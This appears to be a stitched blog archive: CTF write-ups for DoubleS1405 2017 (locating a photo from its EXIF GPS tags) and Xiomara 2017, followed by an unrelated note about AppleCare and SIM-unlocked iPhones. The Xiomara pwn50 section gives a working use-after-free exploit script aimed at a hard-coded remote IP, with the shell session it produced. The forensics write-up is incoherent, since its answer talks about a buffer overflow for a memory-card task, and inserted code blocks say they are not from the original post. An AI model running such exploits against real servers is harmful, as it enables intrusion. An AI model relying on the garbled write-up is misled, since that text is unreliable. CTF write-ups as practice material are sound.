
DoubleS1405 CTF 2017 Writeup

CTF

I took part in DoubleS1405 CTF 2017 as a member of team Harekaze. The team's total score was 881 points.

[Misc 1] Mic Check

Problem

flag{W3lc0me_T0_DoubleS1405_CTF!}

FLAG: W3lc0me_T0_DoubleS1405_CTF!

[Misc 50] Instead of 5 billion won, I give you a cute handcuffs.

Problem 

In the fall of 2016, an e-mail arrived for detective Kim, who is tracking down economic fugitives who siphoned large amounts of money from a large corporation.
It read: "I know the location of the perpetrator, but I cannot tell you; if you pay me 5 billion I will tell you the exact location," and a photograph was attached.
The attached photo was taken nearest to his refuge.
Can Kim find out where the shooter escaped?
(The correct answer is the address in Korea. Example: 52-3, Yeonsan-dong, Yeonje-gu, Busan, Republic of Korea)

— File Info —

ctf% exiftool 1.JPG
ExifTool Version Number         : 10.40
File Name                       : 1.JPG
Directory                       : .
File Size                       : 5.1 MB
File Modification Date/Time     : 2017:03:25 12:50:02+09:00
File Access Date/Time           : 2017:03:25 12:51:43+09:00
File Inode Change Date/Time     : 2017:03:25 12:50:10+09:00
File Permissions                : rw-r--r--
File Type                       : JPEG
File Type Extension             : jpg
MIME Type                       : image/jpeg
Exif Byte Order                 : Big-endian (Motorola, MM)
Make                            : Apple
Camera Model Name               : iPhone 6s
Orientation                     : Rotate 180
X Resolution                    : 72
Y Resolution                    : 72
Resolution Unit                 : inches
Software                        : 9.3.2
Modify Date                     : 2016:11:06 13:50:52
Y Cb Cr Positioning             : Centered
Exposure Time                   : 1/120
F Number                        : 2.2
Exposure Program                : Program AE
ISO                             : 40
Exif Version                    : 0221
Date/Time Original              : 2016:11:06 13:50:52
Create Date                     : 2016:11:06 13:50:52
Components Configuration        : Y, Cb, Cr, -
Shutter Speed Value             : 1/120
Aperture Value                  : 2.2
Brightness Value                : 5.751730959
Exposure Compensation           : 0
Metering Mode                   : Multi-segment
Flash                           : Off, Did not fire
Focal Length                    : 4.2 mm
Subject Area                    : 2015 1511 2217 1330
Run Time Flags                  : Valid
Run Time Value                  : 8415890928500
Run Time Epoch                  : 0
Run Time Scale                  : 1000000000
Acceleration Vector             : 0.9942806863 0.02069931851 -0.1201243357
Sub Sec Time Original           : 027
Sub Sec Time Digitized          : 027
Flashpix Version                : 0100
Color Space                     : sRGB
Exif Image Width                : 4032
Exif Image Height               : 3024
Sensing Method                  : One-chip color area
Scene Type                      : Directly photographed
Exposure Mode                   : Auto
White Balance                   : Auto
Focal Length In 35mm Format     : 29 mm
Scene Capture Type              : Standard
Lens Info                       : 4.15mm f/2.2
Lens Make                       : Apple
Lens Model                      : iPhone 6s back camera 4.15mm f/2.2
GPS Latitude Ref                : North
GPS Longitude Ref               : East
GPS Altitude Ref                : Above Sea Level
GPS Time Stamp                  : 04:50:51
GPS Speed Ref                   : km/h
GPS Speed                       : 0
GPS Img Direction Ref           : True North
GPS Img Direction               : 115.244898
GPS Dest Bearing Ref            : True North
GPS Dest Bearing                : 115.244898
GPS Date Stamp                  : 2016:11:06
GPS Horizontal Positioning Error: 10 m
Compression                     : JPEG (old-style)
Thumbnail Offset                : 2014
Thumbnail Length                : 14110
Image Width                     : 4032
Image Height                    : 3024
Encoding Process                : Baseline DCT, Huffman coding
Bits Per Sample                 : 8
Color Components                : 3
Y Cb Cr Sub Sampling            : YCbCr4:2:0 (2 2)
Aperture                        : 2.2
GPS Altitude                    : 95.3 m Above Sea Level
GPS Date/Time                   : 2016:11:06 04:50:51Z
GPS Latitude                    : 37 deg 40' 11.91" N
GPS Longitude                   : 127 deg 0' 29.88" E
GPS Position                    : 37 deg 40' 11.91" N, 127 deg 0' 29.88" E
Image Size                      : 4032x3024
Megapixels                      : 12.2
Run Time Since Power Up         : 2:20:15
Scale Factor To 35 mm Equivalent: 7.0
Shutter Speed                   : 1/120
Create Date                     : 2016:11:06 13:50:52.027
Date/Time Original              : 2016:11:06 13:50:52.027
Thumbnail Image                 : (Binary data 14110 bytes, use -b option to extract)
Circle Of Confusion             : 0.004 mm
Field Of View                   : 63.7 deg
Focal Length                    : 4.2 mm (35 mm equivalent: 29.0 mm)
Hyperfocal Distance             : 1.82 m
Light Value                     : 10.5

Investigation

GPS Position: 37 deg 40' 11.91" N, 127 deg 0' 29.88" E
was still present in the metadata, so I entered it into Google Maps and similar services.
During the competition the hint read
(The correct answer is the address in Korea.
Example: 대한민국 부산광역시 ~~구 ~~동 37-21)
which made this painful.

238-1 Ui-dong, Gangbuk-gu, Seoul, South Korea
대한민국 서울 강북구 우동 238-1
I got this far, but it was not accepted as solved. While I was puzzling over it,
st98 corrected the Hangul spelling of the place name and got it solved.
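To reproduce the lookup step without copying coordinates by hand, here is an added Python example (not code from the original post) that parses exiftool's text output into decimal degrees, the form Google Maps' search box accepts; the sample text is the GPS lines copied from the listing above.

```python
import re

# Constructed sample: the GPS lines as exiftool printed them in the listing above.
EXIFTOOL_OUTPUT = """\
GPS Latitude Ref                : North
GPS Longitude Ref               : East
GPS Position                    : 37 deg 40' 11.91" N, 127 deg 0' 29.88" E
"""

# One DMS coordinate in exiftool's text form, e.g.  37 deg 40' 11.91" N
DMS_RE = re.compile(r"""(\d+) deg (\d+)' ([\d.]+)" ([NSEW])""")


def dms_to_decimal(deg, minutes, seconds, ref):
    """Convert degrees/minutes/seconds plus hemisphere into signed decimal degrees."""
    value = int(deg) + int(minutes) / 60 + float(seconds) / 3600
    return -value if ref in ('S', 'W') else value


def parse_gps_position(exiftool_text):
    """Return (lat, lon) in decimal degrees from the 'GPS Position' line,
    or None when the listing carries no such tag (no location leak)."""
    for line in exiftool_text.splitlines():
        tag, sep, val = line.partition(':')
        if sep and tag.strip() == 'GPS Position':
            parts = DMS_RE.findall(val)
            if len(parts) != 2:
                raise ValueError('unexpected GPS Position format: ' + val.strip())
            return tuple(dms_to_decimal(*p) for p in parts)
    return None


def maps_query(lat, lon):
    """Format the pair the way the Google Maps search box accepts it."""
    return f"{lat:.6f},{lon:.6f}"


if __name__ == '__main__':
    pos = parse_gps_position(EXIFTOOL_OUTPUT)
    print(pos, maps_query(*pos))
```

The same parser run over exiftool output for a whole photo folder is a quick way to find images that still carry a location tag before they are shared.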

FLAG: 대한민국 서울특별시 강북구 우이동 238-1

www.geoimgr.com / Google Maps

Xiomara CTF 2017 Write-up

CTF

I took part in Xiomara CTF 2017 as a member of team Harekaze. We scored 1576 points, placing 15th out of 333 teams.

[Pwning 50] Use and Throw

Problem

I seem to have access to an old server. Can you get me something out of it?
I mean, I am not expecting much but something'd be really great. Anything goes. 
nc 139.59.61.220 12345
pwn50


ctf% nc 139.59.61.220 12345
[1] Register
[2] Report admin
[3] Save Data to server
[4] Delete user
[5] Exit
Enter your choice:3
Sending ur information to server ..

Investigation

ctf% file pwn50
pwn50: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), 
dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, 
BuildID[sha1]=e6a8871ec4d1215bf32e26a73b3fd7a6611a9710, not stripped 

ctf% checksec pwn50
[*] '/Users/CTF/2017/xiomaractf/pwn50'
Arch:     i386-32-little
RELRO:    Partial RELRO
Stack:    Canary found
NX:       NX enabled
PIE:      No PIE (0x8048000)

gdb-peda$ p/x &fetch_flag
$1 = 0x804868b

Exploit

ctf% python solve.py
[+] Opening connection to 139.59.61.220 on port 12345: Done
[*] Switching to interactive mode
Sending ur information to server ...
$ ls -ll    
total 88    
drwxr-xr-x   2 root root  4096 Feb 23 22:15 bin    
drwxr-xr-x   3 root root  4096 Feb 24 01:32 boot    
drwxr-xr-x  17 root root  3880 Feb 23 15:12 dev    
drwxr-xr-x 100 root root  4096 Feb 26 05:55 etc    
drwxr-xr-x  10 root root  4096 Feb 26 05:39 home    
lrwxrwxrwx   1 root root    32 Feb 24 01:32 initrd.img -> boot/initrd.img-4.4.0-64-generic    
lrwxrwxrwx   1 root root    32 Feb  4 17:24 initrd.img.old -> boot/initrd.img-4.4.0-62-generic    
drwxr-xr-x  22 root root  4096 Feb 24 17:26 lib    
drwxr-xr-x   2 root root  4096 Feb 24 18:34 lib32    
drwxr-xr-x   2 root root  4096 Feb  4 17:23 lib64    
drwxr-xr-x   2 root root  4096 Feb 24 18:34 libx32    
drwx------   2 root root 16384 Feb  4 17:33 lost+found    
drwxr-xr-x   2 root root  4096 Feb  4 17:22 media    
drwxr-xr-x   2 root root  4096 Feb  4 17:22 mnt    
drwxr-xr-x   2 root root  4096 Feb  4 17:22 opt    
dr-xr-xr-x 226 root root     0 Feb 23 15:12 proc    
drwx------   6 root root  4096 Feb 26 04:17 root    
drwxr-xr-x  26 root root  1100 Feb 26 05:56 run    
drwxr-xr-x   2 root root  4096 Feb  4 17:25 sbin    
drwxr-xr-x   2 root root  4096 Jan 14 15:06 snap    
drwxr-xr-x   3 root root  4096 Feb 23 15:37 srv    
dr-xr-xr-x  13 root root     0 Feb 25 10:36 sys    
drwx-wx-wt  17 root root  4096 Feb 26 06:47 tmp    
drwxr-xr-x  12 root root  4096 Feb 24 18:34 usr    
drwxr-xr-x  14 root root  4096 Feb 23 15:23 var    
lrwxrwxrwx   1 root root    29 Feb 24 01:32 vmlinuz -> boot/vmlinuz-4.4.0-64-generic    
lrwxrwxrwx   1 root root    29 Feb  4 17:24 vmlinuz.old -> boot/vmlinuz-4.4.0-62-generic    
$ cd home/pwn1
$ ls
flag.txt
pwn1
$ less flag.txt
xiomara{u$3_m3_n0t_wh3n_y0u_ar3_n0t_bu$y_buT_fr33}

FLAG: xiomara{u$3_m3_n0t_wh3n_y0u_ar3_n0t_bu$y_buT_fr33}

[Forensics & Network 100] (not) Guilty Boyfriend

Problem

My girlfriend is out of town and I found her memory card. Time to dig in, suckaaa. 
DD file

Do the buffer overflow. After that, get lulz_sec/flag.png, extract its LSB data and show the flag (e.g. less flag.txt).

(I am cleaning up my experimental exploit code for publication. Sorry for the delay.)

FLAG: xiomara{i_am_lord_of_hacker}
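For the LSB step, an added example (mine, not the author's code or the challenge files): it hides and recovers a NUL-terminated message in the least-significant bits of constructed RGB sample bytes. Reading a real PNG's pixels would need Pillow, which is left out so the block runs offline.

```python
# Constructed example: hide and recover a message in the least-significant bits of
# RGB sample bytes, the usual layout for a flag.png-style stego challenge.
# The pixel buffer is built in memory; a real PNG would be decoded with Pillow first.

def bits_of(data):
    """Yield the bits of each byte, most significant bit first."""
    for byte in data:
        for i in range(7, -1, -1):
            yield (byte >> i) & 1


def lsb_embed(pixels, message):
    """Write message (plus a NUL terminator) into the LSB of successive sample bytes."""
    payload = message.encode() + b'\x00'
    out = bytearray(pixels)
    bits = list(bits_of(payload))
    if len(bits) > len(out):
        raise ValueError('cover too small: need %d samples, have %d' % (len(bits), len(out)))
    for idx, bit in enumerate(bits):
        out[idx] = (out[idx] & 0xFE) | bit
    return bytes(out)


def lsb_extract(pixels, max_len=4096):
    """Reassemble bytes from successive LSBs until a NUL byte (or max_len) is reached."""
    result = bytearray()
    cur, nbits = 0, 0
    for sample in pixels:
        cur = (cur << 1) | (sample & 1)
        nbits += 1
        if nbits == 8:
            if cur == 0 or len(result) >= max_len:
                break
            result.append(cur)
            cur, nbits = 0, 0
    return bytes(result)


def demo():
    # Constructed cover: a deterministic 32x32 RGB buffer with varied byte values.
    cover = bytes((i * 73 + 19) & 0xFF for i in range(32 * 32 * 3))
    stego = lsb_embed(cover, 'xiomara{constructed_sample_flag}')
    # Every sample differs from the cover by at most 1, so the image looks unchanged.
    assert max(abs(a - b) for a, b in zip(cover, stego)) <= 1
    return lsb_extract(stego).decode()


if __name__ == '__main__':
    print(demo())
```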

— Code —

from pwn import *
import time

# s = process('./pwn50')
s = remote('139.59.61.220', 12345)

# [1] Register: allocate a user record
s.recvuntil(b'choice:')
s.sendline(b'1')
s.recvuntil(b'username:')
s.sendline(b'AAAA')
s.recvuntil(b'password:')
s.sendline(b'BBBB')

# [4] Delete user: the record is freed but, as the flag text hints, still referenced
s.recvuntil(b'choice:')
s.sendline(b'4')

# [2] Report admin: the report data presumably reuses the freed chunk, so the
#     address of fetch_flag (0x804868b, from gdb above) overwrites the stale record
s.recvuntil(b'choice:')
s.sendline(b'2')
time.sleep(.5)
s.sendline(p32(0x804868b))

# [3] Save Data: uses the stale record and ends up calling fetch_flag
s.recvuntil(b'choice:')
s.sendline(b'3')

s.interactive()

When a SIM-unlocked iPhone or similar device is repaired or replaced through AppleCare

iOS


hiww.hatenablog.com

I previously wrote about carrier-model iPhones that had been SIM-unlocked; in roughly a year Apple's handling has become solid, so I am leaving this as a note.


When a SIM-unlocked iPhone or iPad is repaired or replaced through AppleCare

By carrying over the activation state of the previously used device (whether it was SIM-locked, and so on), it can be exchanged for a new unit while keeping the SIM-unlocked state.


checkcoverage.apple.com

In the case of carrier insurance, or SIM-unlocking a device other than an iPhone

For SIM-unlock matters it is more reliable to go to each carrier's store in person and consult them. In that respect AppleCare can be handled entirely by chat or phone, which also saves time. (It is a pity that their support hours close a little early...)

Impressions

When SIM-unlocking by the carriers first became possible, Apple's handling was not clear, but within a few months they had come to handle it this properly, which impressed me a great deal.